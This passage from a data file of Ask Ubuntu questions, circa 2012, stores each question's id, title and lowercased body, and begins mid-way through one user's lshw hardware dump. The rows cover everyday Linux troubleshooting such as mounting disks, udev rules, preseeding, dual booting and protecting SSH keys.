*-logicalcpu:8 description : logical cpu physical id : 4.9 capabilities : logical *-logicalcpu:9 description : logical cpu physical id : 4.a capabilities : logical *-logicalcpu:10 description : logical cpu physical id : 4.b capabilities : logical *-logicalcpu:11 description : logical cpu physical id : 4.c capabilities : logical *-logicalcpu:12 description : logical cpu physical id : 4.d capabilities : logical *-logicalcpu:13 description : logical cpu physical id : 4.e capabilities : logical *-logicalcpu:14 description : logical cpu physical id : 4.f capabilities : logical *-logicalcpu:15 description : logical cpu physical id : 4.10 capabilities : logical *-pci description : host bridge product : core processor dram controller vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 18 width : 32 bits clock : 33mhz configuration : driver=agpgart-intel resources : irq:0 *-display description : vga compatible controller product : core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 18 width : 64 bits clock : 33mhz capabilities : msi pm bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:30 memory : fac00000-faffffff memory : c0000000-cfffffff ( prefetchable ) ioport : f080 ( size=8 ) *-communication unclaimed description : communication controller product : 5 series/3400 series chipset heci controller vendor : intel corporation physical id : 16 bus info : pci @ 0000:00:16.0 version : 06 width : 64 bits clock : 33mhz capabilities : pm msi bus_master cap_list configuration : latency=0 resources : memory : fbc09000-fbc0900f *-usb:0 description : usb controller product : 5 series/3400 series chipset usb2 enhanced host controller vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 06 width : 32 bits clock : 33mhz capabilities : pm debug bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:16 memory : fbc08000-fbc083ff *-multimedia description : audio device product : 5 series/3400 series chipset high definition audio vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 06 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=hda intel latency=0 resources : irq:22 memory : fbc00000-fbc03fff *-pci:0 description : pci bridge product : 5 series/3400 series chipset pci express root port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : 06 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm bus_master cap_list configuration : driver=pcieport resources : irq:24 ioport:2000 ( size=4096 ) memory : bc000000-bc1fffff memory : bc200000-bc3fffff ( prefetchable ) *-pci:1 description : pci bridge product : 5 series/3400 series chipset pci express root port 2 vendor : intel corporation physical id : 1c.1 bus info : pci @ 0000:00:1c.1 version : 06 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm bus_master cap_list configuration : driver=pcieport resources : irq:25 ioport:3000 ( size=4096 ) memory : fbb00000-fbbfffff memory : bc400000-bc5fffff ( prefetchable ) *-network description : wireless interface product : broadcom corporation vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:12:00.0 logical name : eth1 version : 01 serial : c0 : cb:38:8b : aa : d8 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.60.48.36 ip=10.0.1.50 latency=0 multicast=yes wireless=ieee 802.11 resources : irq:17 memory : fbb00000-fbb03fff *-pci:2 description : pci bridge product : 5 series/3400 series chipset pci express root port 3 vendor : intel corporation physical id : 1c.2 bus info : pci @ 0000:00:1c.2 version : 06 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm bus_master cap_list configuration : driver=pcieport resources : irq:26 ioport : e000 ( size=4096 ) memory : fba00000-fbafffff ioport : d0b00000 ( size=1048576 ) *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:13:00.0 logical name : eth0 version : 03 serial : 78:2b : cb : cc:0e:2a size : 10mb/s capacity : 1gb/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half latency=0 link=no multicast=yes port=mii speed=10mb/s resources : irq:28 ioport : e000 ( size=256 ) memory : d0b04000-d0b04fff ( prefetchable ) memory : d0b00000-d0b03fff ( prefetchable ) memory : fba00000-fba1ffff ( prefetchable ) *-pci:3 description : pci bridge product : 5 series/3400 series chipset pci express root port 5 vendor : intel corporation physical id : 1c.4 bus info : pci @ 0000:00:1c.4 version : 06 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm bus_master cap_list configuration : driver=pcieport resources : irq:27 ioport : d000 ( size=4096 ) memory : fb000000-fb9fffff ioport : d0000000 ( size=10485760 ) *-usb:1 description : usb controller product : 5 series/3400 series chipset usb2 enhanced host controller vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 06 width : 32 bits clock : 33mhz capabilities : pm debug bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:23 memory : fbc07000-fbc073ff *-pci:4 description : pci bridge product : 82801 mobile pci bridge vendor : intel corporation physical id : 1e bus info : pci @ 0000:00:1e.0 version : a6 width : 32 bits clock : 33mhz capabilities : pci bus_master cap_list *-isa description : isa bridge product : mobile 5 series chipset lpc interface controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 06 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : latency=0 *-storage description : sata controller product : 5 series/3400 series chipset 6 port sata ahci controller vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 logical name : scsi0 logical name : scsi1 version : 06 width : 32 bits clock : 66mhz capabilities : storage msi pm bus_master cap_list emulated configuration : driver=ahci latency=0 resources : irq:29 ioport : f070 ( size=8 ) ioport : f060 ( size=4 ) ioport : f050 ( size=8 ) ioport : f040 ( size=4 ) ioport : f020 ( size=32 ) memory : fbc06000-fbc067ff *-disk description : ata disk product : wdc wd3200bekt-7 vendor : western digital physical id : 0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 01.0 serial : wd-wx21ac0w1945 size : 298gib ( 320gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=77e3ed41 *-volume:0 description : windows ntfs volume physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 version : 3.1 serial : aa69-51c0 size : 98mib capacity : 100mib capabilities : primary bootable ntfs initialized configuration : clustersize=4096 created=2012-04-03 02:00:15 filesystem=ntfs label=system reserved state=clean *-volume:1 description : windows ntfs volume physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 version : 3.1 serial : 9854ff5c-1dea-a147-84a6-624e758f44b8 size : 48gib capacity : 48gib capabilities : primary ntfs initialized configuration : clustersize=4096 created=2012-04-10 13:55:31 filesystem=ntfs modified_by_chkdsk=true mounted_on_nt4=true resize_log_file=true state=dirty upgrade_on_mount=true *-volume:2 description : extended partition physical id : 3 bus info : scsi @ 0:0.0.0,3 logical name : /dev/sda3 size : 48gib capacity : 48gib capabilities : primary extended partitioned partitioned : extended *-logicalvolume:0 description : linux swap / solaris partition physical id : 5 logical name : /dev/sda5 capacity : 1952mib capabilities : nofs *-logicalvolume:1 description : linux filesystem partition physical id : 6 logical name : /dev/sda6 logical name : / capacity : 46gib configuration : mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , barrier=1 , data=ordered state=mounted *-volume:3 description : windows ntfs volume physical id : 4 bus info : scsi @ 0:0.0.0,4 logical name : /dev/sda4 logical name : /media/56aa8094aa807273 version : 3.1 serial : 22a29e8d-56c7-9a4a-adea-528103948f6d size : 200gib capacity : 200gib capabilities : primary ntfs initialized configuration : clustersize=4096 created=2012-04-02 20:17:15 filesystem=ntfs modified_by_chkdsk=true mount.fstype=fuseblk mount.options=rw , nosuid , nodev , relatime , user_id=0 , group_id=0 , default_permissions , allow_other , blksize=4096 mounted_on_nt4=true resize_log_file=true state=mounted upgrade_on_mount=true *-cdrom description : dvd-ram writer product : dvd+-rw ts-l633j vendor : tsstcorp physical id : 1 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/scd0 logical name : /dev/sr0 version : d200 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc *-serial unclaimed description : smbus product : 5 series/3400 series chipset smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 06 width : 64 bits clock : 33mhz configuration : latency=0 resources : memory : fbc05000-fbc050ff ioport : f000 ( size=32 ) *-generic unclaimed description : signal processing controller product : 5 series/3400 series chipset thermal subsystem vendor : intel corporation physical id : 1f.6 bus info : pci @ 0000:00:1f.6 version : 06 width : 64 bits clock : 33mhz capabilities : pm msi bus_master cap_list configuration : latency=0 resources : memory : fbc04000-fbc04fff *-scsi physical id : 2 bus info : usb @ 2:1.1 logical name : scsi15 capabilities : emulated scsi-host configuration : driver=usb-storage *-disk description : scsi disk physical id : 0.0.0 bus info : scsi @ 15:0.0.0 logical name : /dev/sdb i have tried all options like fdisk /dev/sdb , pmount /dev/sdb but nothing is working .pls guide me
185363	can not locate phpmyadmin	i successfully installed phpmyadmin , via apt-get install phpmyadmin however i ca n't find the directory for phpmyadmin , i want it to appear on /var/www/phpmyadmin so that i can use it via url . where is it ? thanks .
185365	what package do i need to install to develop plugins for gedit ?	i 'm using ubuntu 12.04 with python 2.7.3 and pygobject and i 'd like to develop plugins for gedit in python . i found a simple looking tutorial for this sort of thing here . according to the tutorial , i need the gedit module to interact with the plugin interface : from gi.repository import gobject , gedit i keep getting an import error when trying to import the gedit module . so , my question is : what package do i need to install to get this module ? i 've tried : gedit-dev , gedit-plugins edit : here is the full traceback for the above statement : error : root : could not find any typelib for gedit traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > importerror : can not import name gedit
185367	is there a built-in c++ compiler in 12.04 ?	i just installed ubuntu on my laptop because my programming professor insisted on it . this is my first time using ubuntu . so i had some fairly basic questions . where do i write the code ? i suppose it would be the terminal that opens by ctrl+alt+t , but from there how do i compile the code that i have written ? is there a built in compiler or do i have to install one ? will g++ be okay for ubuntu ? also anything i should know generally which might help ? how or where do i check my disk space and files and all that ? also i cant see my battery 's status .
185368	how to go back to previous line of a script in terminal ?	i am trying to write a script but i 'm stuck here . see the code please ! aug @ august : ~/play $ for i in { 1..100..4 } > do > echo `` august '' > touch august $ i+ $ 2 > mkdir dir is there any way to go previous line ? i mean there was a mistype , i did in touch august $ i+ $ 2 . ipressed enter key , so i went for new line . how can i get back to previous line ?
185369	how to setup ubuntu as a backup server for my windows computer ?	i took my old computer ( amd 5600+ , 2gb ram , 880gt , 250gb sata , etc ) and decided to jump and try ubuntu for the first time . i have very very little knowledge ( red hat when i was younger ) with linux in general . my main desktop is windows 7 and my plan is to use the ubuntu computer as a file server sort of speak . i want to be able to setup back up schedules from my windows pc to the ubuntu pc ( plan on leaving this on 24/7 to double as a seedbox ) how do i go on to doing this ?
185370	12.04 home encrypted and i have written down encryption passphrase . how to reset login password ?	i set up a friend with 12.04 and he forgot his password . i encrypted his home directory and i have written down the encryption passphrase during the first boot . if he changed his password after i wrote down the encryption passphrase during the first boot is this original encryption passphrase of any use ? what should i do to reset or recover his password and keep everything accessible and functionally intact with the encrypted home directory ?
185371	asus 1015cx netbook wo n't boot in 12.04 after installing additional drivers	i have an asus 1015cx netbook with atom dual core , 1gb ram . i installed ubuntu 12.04 with wubi inside windows 7 and everything was okay . but when i installed additional drivers of broadcom and cedar trail , the netbook does not boot after restart . there appears a blank screen and cursor keeps blinking . the same problem happened with xubuntu 12.04 . please suggest .
185374	how to a deb package without quickly ?	i am developing an app now , i 'm using gsetting as my setting back-end , but i ca n't make my .gschema file installed while open the .deb file . i 'm wandering if there is some simple guide for green hand like me to packaging deb ?
185378	how to use gddrescue to make an iso from hard drive ?	i am trying to run ddrescue to make an iso of an old crashed drive . i just do n't know how to find the name of the drive to specify when telling ddrescue to run . if someone could please just tell me how to find this out so i could get this started .
185388	zfs raidz1-0 corrupted data , all disks are online	my zfs pool `` datas '' is unavailable but all my disks are online . do you know how the problem can be fixed ? root @ oxygen : ~ # zpool status pool : datas state : unavail scan : none requested config : name state read write cksum datas unavail 0 0 0 insufficient replicas raidz1-0 unavail 0 0 0 corrupted data scsi-sata_st3000dm001-9yn_w1f0lbvx online 0 0 0 scsi-sata_st3000dm001-9yn_w1f0kyx9 online 0 0 0 scsi-sata_st3000dm001-9yn_w1f0lcc8 online 0 0 0 scsi-sata_st3000dm001-9yn_w1f0lbxz online 0 0 0
185392	fixing two key events on single key press by xmodmap	i 'm using a dell latitude d620 . whenever i press the space key , the down arrow key is also triggered to perform its action . here is the log : keypress event , serial 30 , synthetic no , window 0x3200001 , root 0x10c , subw 0x0 , time 2248017 , ( 70 , -9 ) , root : ( 76,39 ) , state 0x0 , keycode 116 ( keysym 0xff54 , down ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keypress event , serial 31 , synthetic no , window 0x3200001 , root 0x10c , subw 0x0 , time 2248018 , ( 70 , -9 ) , root : ( 76,39 ) , state 0x0 , keycode 65 ( keysym 0x20 , space ) , same_screen yes , xlookupstring gives 1 bytes : ( 20 ) `` `` xmblookupstring gives 1 bytes : ( 20 ) `` `` xfilterevent returns : false keyrelease event , serial 33 , synthetic no , window 0x3200001 , root 0x10c , subw 0x0 , time 2248083 , ( 70 , -9 ) , root : ( 76,39 ) , state 0x0 , keycode 65 ( keysym 0x20 , space ) , same_screen yes , xlookupstring gives 1 bytes : ( 20 ) `` `` xfilterevent returns : false keyrelease event , serial 33 , synthetic no , window 0x3200001 , root 0x10c , subw 0x0 , time 2248085 , ( 70 , -9 ) , root : ( 76,39 ) , state 0x0 , keycode 116 ( keysym 0xff54 , down ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false clientmessage event , serial 33 , synthetic yes , window 0x3200001 , message_type 0x157 ( wm_protocols ) , format 32 , message 0x155 ( wm_delete_window ) the above log is for a single press+release of the space bar key . i would like to know how to fix that . thanks .
185393	mount partitions for only one user	like the title says , is there a way to mount a partition ( on boot or on login ) for only one user , so that other users ca n't access the files but only me ? i searched for some fstab parameters but i found nothing i that would help .
185397	how do i save side panels layout in libreoffice ?	when using libreoffice , i like to have the navigator and the stylist panels open . but to save space , i need to have them on top of the other , not side by side . i can achieve that by using ctrl + moving the panel where i want it to be . but when i re-open the application later , that setting is lost . how do i make this setting persistant ?
185403	udev rule group ownership not working	i have added a udev rule for my arduino , but the symlink gets the ownership `` root root '' instead of `` root dialout '' . $ cat /etc/udev/rules.d/47-arduino.rules subsystem== '' usb '' , attr { idvendor } == '' 2341 '' , attr { idproduct } == '' 0001 '' , mode= '' 0666 '' , symlink+= '' arduino '' , group= '' dialout '' $ ls -la /dev/ar* lrwxrwxrwx 1 root root 15 sep 8 11:02 /dev/arduino - > bus/usb/003/007 $ ls -la /dev/bus/usb/003/007 crw-rw-r -- 1 root dialout 189 , 262 sep 8 11:12 /dev/bus/usb/003/007 my user is a member of the group `` dialout '' but i still get permission denied error when i 'm trying to communicate with the device . there are no problems when i 'm using the `` default '' device `` /etc/ttyacm3 '' . $ ls -la /dev/ttyacm3 crw-rw -- -- 1 root dialout 166 , 3 sep 8 11:12 /dev/ttyacm3 i have tried to restart both the udev service and reboot my computer . how can i fix this ?
185404	keyboard is not working properly	i installed 12.04 and it was working perfectly , but since yesterday i encountered a problem . when i press left ctrl key , it does n't respond but when i press fn key , it works as a ctrl key and loses its own functioning . same with the delete key it works as a pause break key and pause break key is working as a delete key . numlock key is working as a prtscr key . after updating my os , the problem is still happening . please tell me what to do .
185406	specify user for init.d	i have a init.d script that start|stops|restarts a daemon using the start-stop-daemon . this daemon is always started as root . i want to be able to specify the user that the init.d script will use to start the daemon . tried using the -- user option for start-stop-daemon but that is not working . can someone please suggest how to do this .
185409	free serif font with clearly distinguishable 0 ( zero ) character	i 'm using glabels to create some small pieces of paper to give away to people - just two lines of about 15-20 characters each . one of the important parts of the design is that there are no `` o '' ( `` oh '' ) characters , but there are `` 0 '' ( `` zero '' ) characters in an all-lowercase url . therefore i need a non-monospaced ( and very legible in print ) font where `` 0 '' can not be confused with `` o '' even without reference . the closest thing i 've found so far is andale mono and inconsolata , but they are both monospace , and as such not very easy to read in print . alternatively , to find a font myself , is there some way to preview all fonts in the ubuntu repositories without installing them ?
185413	dual booting ubuntu on windows 7 from e : // drive	i am planning on installing ubuntu 12 on top of windows 7 as a dual-bootable system . i have completely emptied the e : // drive , equaling to almost 80 gb of free space . i want to install ubuntu on this drive ( thus leaving only the c : // and f : // drives for windows ) . with reference to this article , can anyone tell me which stage would let me choose the e : // drive as the space where i want to install ubuntu ?
185415	mouse freezes after 20 minutes of use	i use 12.04 and an old hp probook 4515s . every time i start the pc , everything works fine but after about 20 minutes , my mouse freezes . neither the pc nor any program works , just the cursor . what can i do ?
185420	misused mke2fs and can not boot into system	i installed ubuntu with wubi in windows 7 64bit , and i had installed mandriva 2011 with a disk . i tried to learn linux with ubuntu and misused mke2fs ; after i reboot my computer , windows 7 and ubuntu has crashed . as i have mandriva , i boot into mandriva and found # df -h /dev/sda7 12g 9.8g 1.5g 88 % / /dev/sda2 15g 165m 14g 2 % /media/logical /dev/sda6 119g 88g 32g 74 % /media/2c9e85319e84f51c /dev/sda5 118g 59g 60g 50 % /media/d25a6dde5a6dbfb9 /dev/sda9 100g 188m 100g 1 % /media/ae69134a-a65e-488f-ae7f-150d1b5e36a6 /dev/sda1 100m 122k 100m 1 % /media/dellutility /dev/sda3 98g 81g 17g 83 % /media/os # fdisk /dev/sda command ( m for help ) : p disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xd24f801e device boot start end blocks id system /dev/sda1 2048 206847 102400 6 fat16 /dev/sda2 * 206848 30926847 15360000 7 hpfs/ntfs/exfat /dev/sda3 30926848 235726847 102400000 7 hpfs/ntfs/exfat /dev/sda4 235728864 976771071 370521104 f w95 ext 'd ( lba ) /dev/sda5 235728896 481488895 122880000 7 hpfs/ntfs/exfat /dev/sda6 727252992 976771071 124759040 7 hpfs/ntfs/exfat /dev/sda7 481500243 506674034 12586896 83 linux /dev/sda8 506674098 514851119 4088511 82 linux swap / solaris /dev/sda9 514851183 727246484 106197651 83 linux partition table entries are not in disk order i think i may used the following command mke2fs -j -l `` logical '' /dev/sda2 but i had forgotten what kind of partition it was before i transfered it into ext3 . perhaps ntfs data was not lost , and i can view my files as i could in windows . in mandriva , there are following disks : 117.2 gb hard disk , files in it is the same as my windows d : , and ubuntu was installed in it ; 119.0 gb hard disk is my g : , with my personal files in it ; 12.0 gb is the same with mandriva / ( with means root ) , 101.3 gb hard disk with nothing but lost+found ; dellutility should be dell computer utilities pre-installed in my computer ; logical is the disk which i had spoiled , i can view nothing but lost+found ; and os is the c : in my windows . after i boot , grub lets me choose mandriva or windows . i chose windows and it tells me : file system type unknown , partition type 0x7 error 13 : invalid or unsupported executable format i doubt something wrong with windows mbr or something # cat /boot/grub/menu.lst timeout 5 color black/cyan yellow/cyan gfxmenu ( hd0,6 ) /boot/gfxmenu default 0 title linux kernel ( hd0,6 ) /boot/vmlinuz boot_image=linux root=uuid=199581b7-ac7e-4c5f-9888-24c4f213cad8 nokmsboot logo.nologo quiet resume=uuid=34c546e4-9c42-4526-aa64-bbdc0e9d64fd splash=silent vga=788 initrd ( hd0,6 ) /boot/initrd.img title linux-nonfb kernel ( hd0,6 ) /boot/vmlinuz boot_image=linux-nonfb root=uuid=199581b7-ac7e-4c5f-9888-24c4f213cad8 nokmsboot resume=uuid=34c546e4-9c42-4526-aa64-bbdc0e9d64fd initrd ( hd0,6 ) /boot/initrd.img title failsafe kernel ( hd0,6 ) /boot/vmlinuz boot_image=failsafe root=uuid=199581b7-ac7e-4c5f-9888-24c4f213cad8 nokmsboot failsafe initrd ( hd0,6 ) /boot/initrd.img title windows root ( hd0,1 ) makeactive chainloader +1 i can boot into linux , but not ubuntu , it boot into mandriva . i do n't have a boot disk . help me find a way to make it work again .
185423	resizing a partition on remote server via command line	is it possible to re size the filesystem ( ext4 ) partition on a remote server ( running ubuntu server 10.04 or 10.10 ) by using the command line . i will have to ssh to the server . the server is hosted on the cloud ( provider : cloudsigma.com ) the hdd is 50gb but the filesystem partition is just 10gb so i have access to only that much space .
185424	wifi light flickers from red/blue after installing ubuntu	it seems like a bad thing , only happens on ubuntu though , never on windows . any help or ideas why is it happening ?
185429	how to make cairo dock ( with opengl ) excute only on gnome-classic ?	i want to make cairo dock ( with opengl ) execute in the start-up only on gnome-classic but not on other des like cinnamon , unity or gnome.how to do that ?
185431	ca n't automate user creation with preseeding	i 'm creating kvm guest with following virt-install options and preseed.cfg , and always user creation dialog `` [ ! ! ] set up users and passwords '' is shown . how do i automate that section with preseeding ? of course , i checked my preseed.cfg was right with debconf-set-selections -c preseed.cfg . [ install.sh ] # ! /bin/bash sudo virt-install \ -- name=test \ -- connect=qemu : ///system \ -- ram=2048 \ -- vcpus=2 \ -- os-variant=ubuntuprecise \ -- hvm \ -- virt-type=kvm \ -- network=bridge : br0 \ -- location=http : //mirrors.usc.edu/pub/linux/distributions/ubuntu/dists/precise/main/installer-amd64/ \ -- file=test.img \ -- graphics vnc , port=5901 , password=test , listen=0.0.0.0 , keymap=ja \ -- extra-args= '' auto=true priority=critical initrd=/install/initrd.gz preseed/file=preseed.cfg '' [ preseed.cfg ] d-i debian-installer/locale string ja_jp d-i console-keymaps-at/keymap select ja d-i netcfg/get_nameservers string 8.8.8.8 d-i netcfg/get_ipaddress string 192.168.1.50 d-i netcfg/get_netmask string 255.255.255.0 d-i netcfg/get_gateway string 192.168.1.1 d-i netcfg/choose_interface select eth0 d-i netcfg/disable_dhcp boolean true d-i netcfg/dhcp_options select configure network manually d-i netcfg/confirm_static boolean true d-i netcfg/get_hostname string test d-i netcfg/get_hostname seen false d-i netcfg/get_domain string ymotongpoo.local d-i mirror/protocol string http d-i mirror/country string manual d-i mirror/http/hostname string archive.ubuntu.com d-i mirror/http/directory string /ubuntu d-i mirror/http/proxy string d-i clock-setup/utc boolean true d-i time/zone string asia/tokyo d-i clock-setup/ntp boolean true d-i partman-auto/disk string /dev/vda d-i partman-lvm/devide_remove_lvm boolean true d-i partman-md/device_remove_md boolean true d-i partman-auto/method string regular d-i partman-lvm/confirm boolean true d-i partman-auto-lvm/guided_size string max d-i partman-auto/choose_recipe select atomic d-i partman/default_filesystem string ext4 d-i partman/confirm_write_new_label boolean true d-i partman/choose_partition select finish d-i partman/confirm boolean true d-i partman/confirm_nooverwrite boolean true d-i passwd/user-fullname string ubuntu user d-i passwd/username string ubuntu d-i passwd/user-password password spameggham d-i passwd/user-password-again password spameggham d-i user-setup/allow-password-weak boolean true tasksel tasksel/first multiselect standard d-i pkgsel/include string openssh-server vim puppet d-i pkgsel/upgrade select safe-upgrade d-i pkgsel/language-packs multiselect en , ja d-i pkgsel/update-policy select none d-i pkgsel/updatedb boolean false popularity-contest popularity-contest/participate boolean false d-i grub-installer/only_debian boolean true d-i grub-installer/with_other_os boolean true d-i finish-install/reboot_in_progress note
185434	how do make my screen brightness not change when i charge my laptop	i do not want my laptop to change brightness when my laptop power is plugged in or unplugged . i set my brightness based on how bright my surroundings are . if i am in a dark room , i set my brightness very low and when i plug my laptop in the brightness gets set to maximum which is way to bright and will not go down even if i press the button . my laptop is a sony vaio e series , sve15118fgw
185443	turn off tap to click on typing - alps touchpad	there are many questions on the site regarding the alps touchpads which are not recognized by ubuntu . they behave as a ps2 mouse and the touchpad tab is missing from the mouse menu . therefore there is no scroll option and , the most annoying thing , while typing , the cursor often jumps because i touch the touchpad . i found a program which can disable the touchpad on command : touchpad-indicator , which was found on the ubuntu help page . this program seems to be able to stop and start the touchpad on command . i was wondering how can i create a script which turns off the touchpad while typing the keyboard ?
185445	digikam unmet dependencies	some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : digikam : depends : libkface1 ( > = 1.0~digikam2.9.0 ) but it is not going to be installed recommends : kipi-plugins but it is not going to be installed recommends : mplayerthumbs but it is not installable e : unable to correct problems , you have held broken packages .
185448	booting from live usb leads to command line instead of menu	i 'm trying to install 12.04 x64 from a usb stick . i created the live usb as per instructions from ubuntu.com , however , after choosing to boot from usb i get stuck with a command line , titled grub . when i type `` install '' , it replies that `` no kernel is loaded '' . on my other pc everything is fine , the live usb boots just fine . the one i 'm trying to install to has uefi mobo - maybe that 's the problem ? however , fiddling with uefi settings in mobo setup ( uefi/legacy ) has no visible effect .
185449	how to fix skype upside-down web camera in asus k52f onubuntu 12.04 ?	i have tried all softwares from cheese to video4linux but do n't seem to able to find the solution . i have went through few of the earlier qs ' yet still did n't do the job . as is , i am forced to reboot into windows every time i want to use video call on skype . is there an option or a fix somewhere that could eliminate this annoyance for me ?
185454	how can i colour code my files like on a mac ?	is there any way i can label my files with a specific colour in my folders ? i know that this is possible on a mac os .
185458	how can i eliminate wine application options from thunar 's context menu ?	i have xfce and in thunar file association are changing randomly , to wine applications like jpeg and png to internet explorer and mp3 to windows media player . i change it back to gpicview and totem and after a while , when i click on the file it starts up wine again ( which takes forever to load , and ie does n't even work , and gives an error when it loads ) . how can i make my file association changes permanent , and stop them changing to wine software ?
185459	secure your private gpg and ssh keys from other people accessing ssh	there is a person a and person b , other of them has each other ssh public key , so that means they can access each others shell . now they can access each others private ssh and gpg private keys . and they can easily export and them the private keys to themselves . is there a way that they can not access these keys or not able to export them . is there a way to restrict them from accessing each other ~/.gnugp and ~/.ssh folder thanks in advance edit ok i try with my 2 computers i accessed my system with my laptop amr @ amr-notebook : ~ $ ssh rusty @ 192.168.1.8 rusty @ 192.168.1.8 's password : welcome to ubuntu 12.04.1 lts ( gnu/linux 3.2.0-29-generic-pae i686 ) * documentation : https : //help.ubuntu.com/ 11 packages can be updated . 0 updates are security updates . the programs included with the ubuntu system are free software ; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright . ubuntu comes with absolutely no warranty , to the extent permitted by applicable law . rusty @ rusty-ms : ~ $ exit logout connection to 192.168.1.8 closed . amr @ amr-notebook : ~ $ ssh-copy-id -i ~/.ssh/id_rsa.pub rusty @ 192.168.1.8 rusty @ 192.168.1.8 's password : now try logging into the machine , with `` ssh 'rusty @ 192.168.1.8 ' '' , and check in : ~/.ssh/authorized_keys to make sure we have n't added extra keys that you were n't expecting . amr @ amr-notebook : ~ $ ssh rusty @ 192.168.1.8 welcome to ubuntu 12.04.1 lts ( gnu/linux 3.2.0-29-generic-pae i686 ) * documentation : https : //help.ubuntu.com/ 11 packages can be updated . 0 updates are security updates . last login : sat sep 8 21:01:06 2012 from amr-notebook.local rusty @ rusty-ms : ~ $ rusty @ rusty-ms : ~ $ cd .ssh/ rusty @ rusty-ms : ~/.ssh $ ls authorized_keys id_rsa id_rsa.pub rusty @ rusty-ms : ~/.ssh $ i accessed my desktop from my laptop just my shh and password then i logedout and then send my public key to desktop system then i tried again with ssh and this time it just let me in and as u can see above i can easily access desktop systems ssh folder and see all the keys now is there a way that i am not able to access my desktop .ssh folder and no access to desktop public and private keys thanks
185465	how to uninstall ubuntu12.04	i have installed ubuntu 12.04 alongside windows7 home premium in my laptop . i do n't find any options to remove ubuntu . please help me giving detailed steps on how to uninstall ubuntu without altering windows . thankyou
185468	no welcome sound on booting ubuntu 12.04	my ubuntu 12.04 does'nt play any sound ( welcome ) on booting .
185469	tally erp 9 is very slow on ubuntu	we have installed tally erp 9 software on ubuntu 12.04 using wine and it is widely used in india for accounting activities but the software is responding very slowly . if someone can suggest any workaround for this , it would really be appreciated .
185471	what is the equivalent terminal commands for installing languages ?	i know i can install any language and fonts by going clicking dash- > settings- > language support- > install/remove languages but how can i do this if i 'm using ubuntu server and i do not have a gui .
185473	how do i use an ubuntu notebook as second monitor for a fedora desktop ?	i was wondering if there is a possibility to use my netbook with 12.04 as a second monitor for my fedora desktop , because its keyboard is broken but everything else is running just fine . i already read about x2x , but i hope there is a more direct way to do this ( i mean not over the wlan but e.g . via lan etc ) . would it be possible to directly use the monitor without even running the laptop ? for example through an vga adapter ?
185483	system locks up at login after latest update on 12.04	for starters , i am a noob when it comes to ubuntu and linux but i am hopeful that i have the light and the error of my past ms ways . after a recent update last week from 12.04 to 12.04.1 , my system now locks up at the login screen . before the update the system would run but must admit it ran extremely slow . i have installed 12.04 on a dell p4 2.4 ghz , 2 gb ddr ram , 80 gb ide hd and an integrated intel 3d extreme graphics . any ideas on why now the system locking up at login screen ? appreciate any ideas and/or tips .
185485	how to convert ac3 6ch audio to he-aac ? gui solution ?	i want to convert the audio track of a mkv file to he-aac ( aac+/aacplus ) . the audio track is ac3 . but there seems no gui for he-aac encoding ? i only found out there is a command line tool ( cli ) from nero , but i do n't know if this can do he-aac . any help ? any recommendation for a gui that can convert ac3 to he-aac ? also should be able to handle surround sound ( 5.1/6-channels ) .
